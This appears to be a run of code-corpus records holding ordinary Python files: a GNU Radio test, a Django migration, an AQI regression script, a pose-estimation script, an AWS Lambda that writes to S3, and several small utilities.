re.findall('/watch\\?v=+[a-zA-Z0-9-_.]{11}', r.content.decode('utf-8'))\n\n text_file = open(\"videos.txt\", \"w\")\n for video in videos:\n text_file.write(video+'\\n')\n text_file.close()\n\n return videos\n","sub_path":"newyt/ChannelFinder.py","file_name":"ChannelFinder.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"490553865","text":"#!/usr/bin/env python\n# \n# Copyright 2014 <+YOU OR YOUR COMPANY+>.\n# \n# This is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3, or (at your option)\n# any later version.\n# \n# This software is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this software; see the file COPYING. If not, write to\n# the Free Software Foundation, Inc., 51 Franklin Street,\n# Boston, MA 02110-1301, USA.\n# \n\nfrom gnuradio import gr, gr_unittest\nimport power_swig as power\n\nclass qa_power (gr_unittest.TestCase):\n\n def setUp (self):\n self.tb = gr.top_block ()\n\n def tearDown (self):\n self.tb = None\n\n def test_001_power (self):\n # set up fg\n src_data0 = (2,1,4,3,-5)\n src_data1 = (1,2,3,2,3)\n expected_result = (2,1,64,9,-75)\n src0 = blocks.vector_source_f(src_data0)\n src1 = blocks.vector_source_f(src_data1)\n pwr = power.power()\n dst = blocks.vector_sink_f()\n self.tb.connect(src0,sqr)\n self.tb.connect(src1,sqr)\n self.tb.connect(sqr,dst)\n self.tb.run ()\n result_data = dst.data()\n self.assertFloatTuplesAlmostEqual(expected_result,result_data,5)\n \n # check data\n\n\nif __name__ == '__main__':\n gr_unittest.run(qa_power, \"qa_power.xml\")\n","sub_path":"gr-power/python/qa_power.py","file_name":"qa_power.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"231515928","text":"#!/usr/bin/env python\n#coding=utf-8\n'''\nCreated on 2012-6-16\n\n@author: Chine\n'''\n\nimport time\nimport mimetypes\nimport hmac\nfrom hashlib import sha256\n\nfrom errors import ChiliError\n\ndef hmac_sha256_hex(secret, data):\n return hmac.new(secret, data, sha256).hexdigest()\n\nclass FormUploadFile(object):\n def __init__(self, f, fname):\n self.fname = fname\n self.f = f\n\ndef encode_multipart(kwargs):\n '''\n Build a multipart/form-data body with generated random boundary.\n '''\n boundary = '----------%s' % hex(int(time.time() * 1000))\n data = []\n \n for k, v in kwargs.iteritems():\n data.append('--%s' % boundary)\n if isinstance(v, FormUploadFile):\n if hasattr(v.f, 'read'):\n content = v.f.read()\n else:\n content = v.f\n \n file_type = mimetypes.guess_type(v.fname)\n if file_type is None:\n raise ChiliError('utils', -1, 'Could not determine file type')\n file_type = file_type[0]\n \n data.append('Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"' % (k, v.fname))\n data.append('Content-Length: %d' % len(content))\n data.append('Content-Type: %s\\r\\n' % file_type)\n data.append(content)\n else:\n data.append('Content-Disposition: form-data; name=\"%s\"\\r\\n' % k)\n data.append(v.encode('utf-8') if isinstance(v, unicode) else str(v))\n \n data.append('--%s--\\r\\n' % boundary)\n return '\\r\\n'.join(data), boundary","sub_path":"Chili/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"301796406","text":"from srg import srg\nfrom srg.srg import Question, Answer, SRG, array\nfrom srg import solver\nfrom srg import database as db\nfrom srg import sorter\nimport numpy as np\nimport pytest\n\nproblems_all = []\n\nproblems = db.list_problems()\nfor p in problems:\n v,k,l,u = db.extract_vklu(p)\n if v < 20:\n solutions = db.get_solutions(v,k,l,u)\n problems_all.append((v,k,l,u, solutions))\n\n\n@pytest.mark.parametrize('v,k,l,u, database', problems_all)\ndef test_solve(v: int, k: int, l: int, u: int, database):\n srg = SRG(solver._seed(v,k,l,u))\n actuals = solver.solve(srg)\n actuals_sorted = sorter.sort(actuals)\n\n for actual, expected in zip(actuals_sorted, database):\n assert np.array_equal(actual, expected)\n\n\n@pytest.mark.parametrize('v,k,l,u, database', problems_all)\ndef test_solve_question(v: int, k: int, l: int, u: int, database):\n expected_rows = [exp[2, 3:] for exp in database]\n \n s = solver._seed(v, k, l, u)\n q = Question.from_matrix(s) \n actuals = list(solver.solve_question(q)) # actuals are only candidates of real solutions.\n \n for actual in actuals:\n match = map(lambda exp : np.array_equal(exp, actual), expected_rows)\n if any(match):return\n \n assert False, f'actuals {actuals} does not match any in expected {expected_rows}'\n \ndef test2():\n A = srg.array([[0, 1],\n [0, 1],\n [0, 0],\n [1, 0],\n [1, 0],\n [0, 0]])\n b = srg.array([4, 4, 0, 4, 4, 0])\n\n bound = srg.array([4, 4])\n ans = Answer(value=srg.array([0, -1, 0, 0, -1]), location=srg.array([0, 4, 8, 12, 16]), len=20)\n Q = Question(A, b, 8, bound, ans)\n\n solver.only_1_element_in_row(Q)\n Q._invariant_check()\n\n","sub_path":"tests/test_solver.py","file_name":"test_solver.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"318507481","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\nfrom django.conf import settings\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('auth', '0006_require_contenttypes_0002'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='MyUser',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('password', models.CharField(max_length=128, verbose_name='password')),\n ('last_login', models.DateTimeField(null=True, verbose_name='last login', blank=True)),\n ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),\n ('avatar', models.ImageField(upload_to=b'user', verbose_name='Profile image', blank=True)),\n ('username', models.CharField(error_messages={b'unique': 'A user with that username already exists.'}, max_length=30, validators=[django.core.validators.RegexValidator(b'^[\\\\s\\\\w.@+-]+$', 'Enter a valid username. This value may contain only letters, numbers and @/./+/-/_ characters.', b'invalid')], help_text='Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only.', unique=True, verbose_name='username')),\n ('first_name', models.CharField(max_length=30, verbose_name='first name', blank=True)),\n ('last_name', models.CharField(max_length=30, verbose_name='last name', blank=True)),\n ('email', models.EmailField(max_length=254, verbose_name='email address', blank=True)),\n ('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),\n ('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),\n ('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),\n ('groups', models.ManyToManyField(related_query_name='user', related_name='user_set', to='auth.Group', blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', verbose_name='groups')),\n ('user_permissions', models.ManyToManyField(related_query_name='user', related_name='user_set', to='auth.Permission', blank=True, help_text='Specific permissions for this user.', verbose_name='user permissions')),\n ],\n ),\n migrations.CreateModel(\n name='Competition',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=1000, verbose_name='Name of Competition')),\n ('image', models.ImageField(upload_to=b'competition', verbose_name='Photo of Competition')),\n ],\n ),\n migrations.CreateModel(\n name='Photo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('create_date', models.DateTimeField(auto_now=True)),\n ('small_image', models.ImageField(upload_to=b'photo/small', verbose_name='Small photo')),\n ('image', models.ImageField(upload_to=b'photo', verbose_name='Photo')),\n ('author', models.ForeignKey(verbose_name='author', to=settings.AUTH_USER_MODEL)),\n ('competition', models.ForeignKey(verbose_name='Competition', to='main.Competition')),\n ],\n ),\n ]\n","sub_path":"main/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"451770758","text":"from pyravendb.store.document_store import DocumentStore\n\n\nclass OpeningSession(object):\n @staticmethod\n def open_session():\n store = DocumentStore()\n store.initialize()\n\n # region open_session_1\n # Open session for a 'default' database configured in 'documentstore'\n with store.open_session() as session:\n session.load(\"doc/1\")\n # code here\n\n # Open session for a specific database\n with store.open_session(database=\"Your database\") as session:\n session.load(\"doc/2\")\n # code here\n\n # Open session with request_executor\n request_executor = RequestsExecutor(database_name=\"Your database\", certificate=None)\n with DocumentStore.open_session(request_executor=request_executor) as session:\n session.load(\"doc/3\")\n # code here\n\n # endregion\n","sub_path":"Documentation/4.0/Samples/python/clientapi/session/OpeningSession.py","file_name":"OpeningSession.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"418343746","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom sklearn.cross_decomposition import PLSRegression \r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib\r\nimport matplotlib.pylab as plt\r\nimport xlrd\r\nimport xlwt\r\nimport random\r\n\r\n###############################\r\n#新的X和Y\r\n\r\n#读入AQI(Y)数据excel\r\nfile = r\"aqi-beijing.xlsx\"\r\nbook = xlrd.open_workbook(file)\r\nsheet0 = book.sheet_by_index(0)\r\ny = []\r\nstart = 1\r\nend = 1000\r\nweather = []\r\nfor i in range(start, end):\r\n #调整AQI范围\r\n y.append(float(sheet0.cell_value(i, 10)))\r\n try:\r\n weather.append(float(sheet0.cell_value(i, 5)))\r\n except:\r\n weather.append(0)\r\ny = np.array(y).reshape(int(len(y)), 1)\r\nweather = np.array(weather).reshape(int(len(weather)/1), 1)\r\n\r\n#挑选连续时间真实值\r\ncontinuous_start = 230\r\ncontinuous_end = 290\r\nY_Treal = y[continuous_start:continuous_end]\r\nY_Treal = np.array(Y_Treal).reshape(len(Y_Treal), 1)\r\n\r\n\r\n#读入所有天气因素(X)数据excel\r\nfile = r\"weather-beijing.xls\"\r\nbook = xlrd.open_workbook(file)\r\nsheet0 = book.sheet_by_index(0)\r\nx = []\r\nfor i in range(start, end):\r\n for m in range(1, 8):\r\n day_value = 0\r\n sumall = 0\r\n count = 0\r\n for j in range(1,9):\r\n while sheet0.cell_value(j + 8 * i, m) == '':\r\n j = j + 1\r\n try:\r\n sumall = sumall + float(sheet0.cell_value(j+8*i, m))\r\n except:\r\n sumall = 0\r\n count = count + 1\r\n day_value = float(sumall/count)\r\n x.append(day_value)\r\nx = np.array(x).reshape(int(len(x)/7), 7)\r\nx = np.concatenate((x, weather), axis = 1)\r\n\r\n\r\n##########################\r\n#选择数据集和范围\r\nnumber_train = int(0.65*len(y))\r\nnumber_test = int(0.95*len(y))\r\n\r\nx_train = x[0:number_train,:]\r\nx_test = x[number_train+1:number_test,:]\r\nx_valid = x[number_test+1:int(len(y)) + 1,:]\r\n\r\ny_train = y[0:number_train,:]\r\ny_test = y[number_train+1:number_test,:]\r\ny_valid = y[number_test+1:int(len(y)) + 1,:]\r\n\r\n#选连续的预测输入集\r\nx = x.reshape(-1)\r\nx = x.tolist()\r\nx_T = x[8*continuous_start:8*continuous_end]\r\nx_T = np.array(x_T).reshape(int(len(x_T)/8), 8)\r\n\r\n##################\r\n#筛选在一定范围内的预测数据集\r\nAQI_min = 100\r\nAQI_max = 200\r\nstep = 0\r\ny_test = y_test.reshape(-1)\r\ny_test = y_test.tolist()\r\nx_test = x_test.reshape(-1)\r\nx_test = x_test.tolist()\r\nwhile step != len(y_test):\r\n if y_test[step] not in range(AQI_min, AQI_max):\r\n y_test.remove(y_test[step])\r\n del(x_test[8 * step : 8 * step + 8])\r\n else:\r\n step += 1\r\nx_test = np.array(x_test).reshape(int(len(x_test)/8),8)\r\ny_test = np.array(y_test).reshape(int(len(y_test)), 1)\r\n\r\n\r\n#打乱顺序\r\n'''\r\nshuffle = np.hstack((y, x))\r\nnp.random.shuffle(shuffle)\r\ny = np.array([shuffle[i][0] for i in range(shuffle.shape[0])])\r\ny = np.array(y).reshape(int(len(y)), 1)\r\nx = np.array([shuffle[i][1:] for i in range(shuffle.shape[0])])\r\n#x = np.array(x).reshape(int(len(x)/7),7)\r\n'''\r\n\r\n\r\n######################################\r\n#选择潜变量个数,这里没有用S,用的是R^2和RSE\r\nrr2 = [] \r\nerror = []\r\n#潜变量个数需要调整\r\nfor i in range(1, 8):\r\n pls2 = PLSRegression( n_components = i )\r\n pls2.fit(x_train, y_train)\r\n Y_pred = pls2.predict(x_valid)\r\n m, n=x_valid.shape\r\n meany=np.mean(y_valid, 0)\r\n rmse = ((sum((Y_pred - y_valid) ** 2)/(m - 2))) ** 0.5/100\r\n tss = sum((meany - y_valid) ** 2)\r\n rss = sum((Y_pred - y_valid) ** 2)\r\n r2 = 1 - rss / tss\r\n error.append(rmse)\r\n rr2.append(r2)\r\nerror = np.array(error)\r\nrr2 = np.array(rr2)\r\n#print(error)\r\n#print(rr2)\r\n\r\n\r\n##################\r\n#画均方根误差和R2(评级指标)\r\n#选择最优的n_components\r\n'''\r\nplt.figure('error analysis')\r\nplt.ylabel('Average error rate S')\r\nplt.xlabel('The number of latent variables')\r\nx_label = range(1, 8)\r\nplt.plot(x_label, error, \"x-\", label = \"RMSE\")\r\nplt.ylim(0.2, 0.5)\r\nplt.legend()\r\nplt.show()\r\n'''\r\n\r\n###################\r\n#画最终的结果\r\n#选择潜变量个数为3的模型,根据cross validation调整\r\npls2 = PLSRegression(n_components = 4)\r\npls2.fit(x_train, y_train)\r\nY_pred = pls2.predict(x_test)\r\nY_Tpred = pls2.predict(x_T)\r\n\r\n\r\n####################\r\n#计算预测误差\r\nS = (sum((y_test - Y_pred)**2) / len(Y_pred))**0.5 / np.mean(y_test)\r\nprint(\"S: %f\" %S[0])\r\n\r\nfig = plt.figure()\r\n\r\nplt.plot(Y_pred, marker='x', color='red',linewidth=0.7, linestyle='--', label='AQI predict')\r\nplt.plot(y_test, marker='x', color='blue', linewidth=0.7, linestyle='--', label='AQI real')\r\nplt.xlabel(\"Sample\")\r\nplt.ylabel(\"AQI\")\r\nplt.title(\"Prediction result\")\r\nplt.ylim(50, AQI_max+50)\r\nplt.legend(loc = 'best')\r\nplt.show()\r\n\r\n####################\r\n#计算连续时间预测误差\r\nS = (sum((Y_Treal - Y_Tpred)**2) / len(Y_Tpred))**0.5 / np.mean(Y_Treal)\r\nprint(\"S: %f\" %S[0])\r\n\r\nfig = plt.figure()\r\nplt.plot(Y_Tpred, marker='x', color='red', linewidth=0.7, linestyle='--',label='AQI predict')\r\nplt.plot(Y_Treal, marker='x', color='blue', linewidth=0.7, linestyle='--',label='AQI real')\r\nplt.xlabel(\"Random continuous date\")\r\nplt.ylabel(\"AQI\")\r\nplt.title(\"Prediction result\")\r\nplt.ylim(min(min(Y_Tpred), min(Y_Treal))-50, max(max(Y_Tpred), max(Y_Treal))+50)\r\nplt.legend(loc = 'best')\r\nplt.show()\r\n","sub_path":"PLS0227.py","file_name":"PLS0227.py","file_ext":"py","file_size_in_byte":5250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"190895948","text":"### DFYW 3\n# combined with maskcnn\n\n### DFYW 2\n\n\nfrom PIL import Image\nimport os\nimport numpy as np\nimport sys\nsys.path.append(\"../\")\nfrom lib.network import PoseNet, PoseRefineNet\nimport torch\nimport numpy.ma as ma\nimport scipy.io as scio\nimport YWTools\nimport torchvision.transforms as transforms\nfrom torch.autograd import Variable\nfrom lib.transformations import euler_matrix, quaternion_matrix, quaternion_from_matrix,euler_from_quaternion\nimport copy\nfrom matplotlib import pyplot as plt\nimport matplotlib.patches as patches\nfrom posecnn.YW_poseCNN import MASKCNN\nimport torchvision.transforms.functional as TF\nvector_ploter=YWTools.plot3d_vector_tool()\nvector_ploter.add_origin() #增加原点向量\nimport math\nsgmentor=MASKCNN.mask_cnn_segmentor(root_path=os.path.join(os.getcwd(),\"posecnn\",\"YW_poseCNN\"))\ntest_one_img, test_one_depth=sgmentor.get_an_test_img_and_depth() # in reality, it should come from camera.\n# vector_ploter.show()\n# Parameters\n\n\nnum_points = 1000 #???\nnum_obj = 21 # ycb 已经训练好了,含有21个类,不能改。\nborder_list = [-1, 40, 80, 120, 160, 200, 240, 280, 320, 360, 400, 440, 480, 520, 560, 600, 640, 680] #???\n# img_width = 480 #输入图片尺寸\n# img_length = 640\nxmap = np.array([[j for i in range(640)] for j in range(480)]) #[0000...,1111...,222] 480,640\nymap = np.array([[i for i in range(640)] for j in range(480)]) #[0 1 2 3..., 0 1 2 3 ..., 0 1 2 3 ...] 480,640\nnorm = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) #???\nbs=1 # batch size\niteration = 2 #???\n\n\n #camera paras\ncam_cx = 312.9869 #???\ncam_cy = 241.3109 #???\ncam_fx = 1066.778 #x方向焦距,水平\ncam_fy = 1067.487 #y方向焦距,垂直\ncam_scale = 10000.0 # scale\n\n\nbanana_dataset_dir=\"../datasets/yw_test/rgbd-dataset/banana/banana_1\"\ntest_image_file=os.path.join(banana_dataset_dir,\"banana_1_1_1.png\")\ntest_depth_file=os.path.join(banana_dataset_dir,\"banana_1_1_1_depth.png\")\ntest_label_file=os.path.join(banana_dataset_dir,\"banana_1_1_1_mask.png\")\ntest_bbox_file=os.path.join(banana_dataset_dir,\"banana_1_1_1_loc.txt\")\nbanana_bbox=[227,245,150,60]\n\nesti_model_file=\"../trained_checkpoints/ycb/pose_model_26_0.012863246640872631.pth\"\nrefine_model_file=\"../trained_checkpoints/ycb/pose_refine_model_69_0.009449292959118935.pth\"\n\n# rgbd dataset - banana # http://rgbd-dataset.cs.washington.edu/dataset/rgbd-dataset/\n\n\n# img = Image.open(test_image_file)\ndepth = np.array(Image.open(test_depth_file))\nlabel_banana=np.array(Image.open(test_label_file))\nimg = test_one_img\n# depth = np.array(test_one_depth)\nlabel_banana=np.array(Image.open(test_label_file))\n# 480,640 True , False\n## load Estimator Net\nestimator = PoseNet(num_points = num_points, num_obj = num_obj)\nestimator.cuda()\nestimator.load_state_dict(torch.load(esti_model_file))\nestimator.eval()\nrefiner = PoseRefineNet(num_points = num_points, num_obj = num_obj)\nrefiner.cuda()\nrefiner.load_state_dict(torch.load(refine_model_file))\nrefiner.eval()\n\n## Prediction\n\nposecnn_meta = scio.loadmat(\"test/000003.mat\")\nlabel = np.array(posecnn_meta['labels']) #segmentation label 0/1, 有物体画1,无物体画0\nposecnn_rois = np.array(posecnn_meta['rois']) #rois 是用来获得bounding box的\n#rois\n#行数,物体的个数\n#第0列,\n#第1列,物体id\n#第3,5列,rowmin rowmax\n#第2,4列,colmin colmax\n# lst = posecnn_rois[:, 1:2].flatten() #[ 1. 20. 14. 6. 19.]#说明里面有5个物体,\nlst = [1] # assume only banana\nmy_result_wo_refine = [] #???\nmy_result = []\n\n\n\nfor idx in range(len(lst)):\n itemid = lst[idx]\n try:\n\n #eval by segmentor\n seg_res=sgmentor.get_eval_res_by_name(TF.to_tensor(img),\"banana\")\n x1,y1,x2,y2=seg_res[\"box\"]\n banana_bbox_draw=sgmentor.get_box_rcwh(seg_res[\"box\"])\n rmin, rmax, cmin, cmax = int(x1),int(x2),int(y1),int(y2)\n\n # rmin, rmax, cmin, cmax = YWTools.get_bbox(posecnn_rois,border_list,img_width,img_length,idx)\n\n mask_depth = ma.getmaskarray(ma.masked_not_equal(depth, 0)) #ok\n # mask_label = ma.getmaskarray(ma.masked_equal(label, itemid)) #label from 000003.mat\n\n label_banana = np.squeeze(seg_res[\"mask\"])\n\n # label_banana = ma.getmaskarray(ma.masked_not_equal(label_banana,0))\n label_banana = ma.getmaskarray(ma.masked_greater(label_banana,0.5))\n label_banana_nonzeros=label_banana.flatten().nonzero()\n # label_banana=np.array(Image.open(test_label_file))\n\n mask_label = ma.getmaskarray(ma.masked_equal(label_banana, itemid)) #label from banana label\n mask = mask_label * mask_depth\n\n # Add the patch to the Axes\n # fig, ax = plt.subplots(1)\n # ax.imshow(depth)\n # plt.show()\n\n # plt.imshow(mask)\n # plt.show()\n # plt.imshow(mask_depth)\n # plt.show()\n # plt.imshow(mask_label)\n # plt.show()\n # plt.imshow(mask)\n # plt.show()\n mask_nonzeros=mask[:].flatten().nonzero()\n #(3634)[18993 18994 18995 18996 18997]\n choose = mask[rmin:rmax, cmin:cmax].flatten().nonzero()[0]\n if len(choose) > num_points:\n c_mask = np.zeros(len(choose), dtype=int)\n c_mask[:num_points] = 1\n np.random.shuffle(c_mask)\n choose = choose[c_mask.nonzero()]\n else:\n print(\"len of choose is 0, check error\")\n choose = np.pad(choose, (0, num_points - len(choose)), 'wrap')\n\n depth_masked = depth[rmin:rmax, cmin:cmax].flatten()[choose][:, np.newaxis].astype(np.float32)\n xmap_masked = xmap[rmin:rmax, cmin:cmax].flatten()[choose][:, np.newaxis].astype(np.float32)\n ymap_masked = ymap[rmin:rmax, cmin:cmax].flatten()[choose][:, np.newaxis].astype(np.float32)\n choose = np.array([choose])\n\n pt2 = depth_masked / cam_scale\n pt0 = (ymap_masked - cam_cx) * pt2 / cam_fx\n pt1 = (xmap_masked - cam_cy) * pt2 / cam_fy\n cloud = np.concatenate((pt0, pt1, pt2), axis=1)\n\n img_masked = np.array(img)[:, :, :3]\n img_masked = np.transpose(img_masked, (2, 0, 1))\n img_masked = img_masked[:, rmin:rmax, cmin:cmax]\n\n cloud = torch.from_numpy(cloud.astype(np.float32))\n choose = torch.LongTensor(choose.astype(np.int32))\n img_masked = norm(torch.from_numpy(img_masked.astype(np.float32)))\n index = torch.LongTensor([itemid - 1])\n\n cloud = Variable(cloud).cuda()\n choose = Variable(choose).cuda()\n img_masked = Variable(img_masked).cuda()\n index = Variable(index).cuda()\n\n cloud = cloud.view(1, num_points, 3)\n img_masked = img_masked.view(1, 3, img_masked.size()[1], img_masked.size()[2])\n\n pred_r, pred_t, pred_c, emb = estimator(img_masked, cloud, choose, index)\n pred_r = pred_r / torch.norm(pred_r, dim=2).view(1, num_points, 1)\n\n pred_c = pred_c.view(bs, num_points)\n how_max, which_max = torch.max(pred_c, 1)\n pred_t = pred_t.view(bs * num_points, 1, 3)\n points = cloud.view(bs * num_points, 1, 3)\n\n my_r = pred_r[0][which_max[0]].view(-1).cpu().data.numpy()\n my_t = (points + pred_t)[which_max[0]].view(-1).cpu().data.numpy()\n my_pred = np.append(my_r, my_t)\n my_result_wo_refine.append(my_pred.tolist())\n\n for ite in range(0, iteration):\n T = Variable(torch.from_numpy(my_t.astype(np.float32))).cuda().view(1, 3).repeat(num_points,\n 1).contiguous().view(1,\n num_points,\n 3)\n my_mat = quaternion_matrix(my_r)\n R = Variable(torch.from_numpy(my_mat[:3, :3].astype(np.float32))).cuda().view(1, 3, 3)\n my_mat[0:3, 3] = my_t\n\n new_cloud = torch.bmm((cloud - T), R).contiguous()\n pred_r, pred_t = refiner(new_cloud, emb, index)\n pred_r = pred_r.view(1, 1, -1)\n pred_r = pred_r / (torch.norm(pred_r, dim=2).view(1, 1, 1))\n my_r_2 = pred_r.view(-1).cpu().data.numpy()\n my_t_2 = pred_t.view(-1).cpu().data.numpy()\n my_mat_2 = quaternion_matrix(my_r_2)\n\n my_mat_2[0:3, 3] = my_t_2\n\n my_mat_final = np.dot(my_mat, my_mat_2)\n my_r_final = copy.deepcopy(my_mat_final)\n my_r_final[0:3, 3] = 0\n my_r_final = quaternion_from_matrix(my_r_final, True)\n my_t_final = np.array([my_mat_final[0][3], my_mat_final[1][3], my_mat_final[2][3]])\n\n my_pred = np.append(my_r_final, my_t_final)\n my_r = my_r_final\n my_t = my_t_final\n\n my_euler_form_r=euler_from_quaternion(my_r)\n print(\"my_euler_form_r\",my_euler_form_r)\n #my_euler_form_r : (0.9198490563735781, -0.007832527911272334, -0.47081842893943104)\n my_euler_yaw=list(my_euler_form_r)[2]\n my_rotation_matrix_from_euler=euler_matrix(my_euler_form_r[0],my_euler_form_r[1],my_euler_form_r[2])\n # [[0.90679773 0.18969227 - 0.37647672 0.]\n # [-0.41995766 0.48440958 - 0.76745223 0.]\n # [0.03678917 0.85402822 0.51892423 0.]\n # [0. 0. 0. 1.]]\n x=np.dot(my_rotation_matrix_from_euler,np.array([[1,0,0,1]]).transpose()).flatten()\n y=np.dot(my_rotation_matrix_from_euler,np.array([[0,1,0,1]]).transpose()).flatten()\n z=np.dot(my_rotation_matrix_from_euler,np.array([[0,0,1,1]]).transpose()).flatten()\n newvs=[]\n\n grasp_vector=[math.cos(my_euler_yaw),math.sin(my_euler_yaw),0]\n # newvs.append([0,0,0,grasp_vector[0],grasp_vector[1],grasp_vector[2]])\n\n mx=my_rotation_matrix_from_euler[0,0:3]\n my=my_rotation_matrix_from_euler[1,0:3]\n mz=my_rotation_matrix_from_euler[2,0:3]\n newvs.append([0,0,0,mx[0],mx[1],mx[2]])\n newvs.append([0,0,0,my[0],my[1],my[2]])\n newvs.append([0,0,0,mz[0],mz[1],mz[2]])\n # newvs.append([0,0,0,x[0],x[1],x[2]])\n # newvs.append([0,0,0,y[0],y[1],y[2]])\n # newvs.append([0,0,0,z[0],z[1],z[2]])\n # newvs.append([0,0,0,x[0],x[1],0])\n # newvs.append([0,0,0,1,1,1])\n # newvs.append([0,0,0,y[0],y[1],0])\n # newvs.append([0,0,0,z[0],z[1],0])\n vector_ploter.addvs(newvs)\n\n # Here 'my_pred' is the final pose estimation result after refinement ('my_r': quaternion, 'my_t': translation)\n\n my_result.append(my_pred.tolist())\n\n #plot mask\n maskfig = plt.figure(\"mask plot\")\n ax = maskfig.add_subplot(111)\n rect = patches.Rectangle(xy=(banana_bbox_draw[1],banana_bbox_draw[0]), width=banana_bbox_draw[2], height=banana_bbox_draw[3], linewidth=5, edgecolor='w', facecolor='none')\n ax.imshow(img)\n # patches.Rectangle(xy=(),width=,height=)\n # ax.imshow(np.squeeze(seg_res[\"mask\"]))\n # ax.imshow(label_banana)\n ax.add_patch(rect)\n # plt.show()\n\n except ZeroDivisionError:\n print(\"PoseCNN Detector Lost {0} at No.{1} keyframe\".format(itemid, now))\n my_result_wo_refine.append([0.0 for i in range(7)])\n my_result.append([0.0 for i in range(7)])\n\nprint(\"my_result,\",my_result)\nvector_ploter.show()","sub_path":"DenseFusion/tools/DFYW3_backup.py","file_name":"DFYW3_backup.py","file_ext":"py","file_size_in_byte":11528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"52761176","text":"import boto3\nimport json\nimport uuid\n\nbucket_name = 'rebeccacode-repo-a1'\n\n\ndef lambda_handler(event, context):\n result = {'request_id': '', 'request_url': ''}\n\n try:\n s3_client = boto3.client('s3')\n\n request_id = new_id()\n file_name = '{}-olympic-data-request.json'.format(request_id)\n\n data = {'request_id': request_id, 'criteria': event['criteria']}\n\n s3_client.put_object(Bucket=bucket_name,\n Key=file_name,\n Body=json.dumps(data),\n ContentEncoding='utf-8',\n ContentType='application/json',\n Metadata={'request_id': request_id})\n\n result['request_id'] = request_id\n result['request_url'] = s3_client.generate_presigned_url(\n ClientMethod='get_object',\n Params={\n 'Bucket': bucket_name,\n 'Key': file_name\n }\n )\n\n except Exception as e:\n print(e)\n raise e\n\n return result\n\n\ndef new_id():\n return str(uuid.uuid4())","sub_path":"aws/lambda/create-olympic-data-request.py","file_name":"create-olympic-data-request.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"297503328","text":"from ATFCommons import ATFCommons as ATFC\nimport ATFCommons\nimport sys\n\nclass ATFCommonsWrapper:\n\n def __init__(self):\n self._atfc= ATFC()\n reload(sys)\n sys.setdefaultencoding(\"utf-8\")\n\n\n def Get_As_List(self, obj, retDictKeys=True):\n #self._atfc.Debug_Log(\"%s - %s \" % (ATFCommons.funcname(), obj))\n print(\"%s - %s \" % (ATFCommons.funcname(), obj))\n return self._atfc.Get_As_List(obj, retDictKeys)\n","sub_path":"src/ATFCommonsWrapper.py","file_name":"ATFCommonsWrapper.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"224475282","text":"from pylab import *\nfrom scipy.integrate import odeint\nimport matplotlib\n\n\nlambda_0=0\nr=0.1 \n\nxi_step = .05\nxi_interval = linspace(-11,11,int(22/xi_step),endpoint=0)\n\n#HS pulse params\nomega = 3\nrho = 1/(sqrt(5))\npsi = arctan(2)\n\n\n\n\n#integrate the connection around gamma_3\ntheta_init=0\ns_numsteps=10000\ndelta = 2*pi/s_numsteps\nsspan=linspace(0,2*pi,130)\n\n###############################################################################\n#Define the xi_derivative for fixed lambda\ndef u_xi(xi,u,lam,sigma):\n q1 = cos(omega*log(cosh(xi)))/cosh(xi)\n q2 = -sin(omega*log(cosh(xi)))/cosh(xi)\n a_31 = (lam*rho*cos(psi) + 1 - omega**2 - \n (2 - omega**2)*(q2**2 + 3*q1**2) + 6*omega*q1*q2)\n a_32 = (-lam*rho*sin(psi) - 2*omega - \n 2*(2 - omega**2)*q1*q2 + 3*omega*(q1**2 + 3*q2**2))\n a_41 = (lam*rho*sin(psi) + 2*omega - \n 2*(2 - omega**2)*q1*q2 - 3*omega*(3*q1**2 +q2**2))\n a_42 = 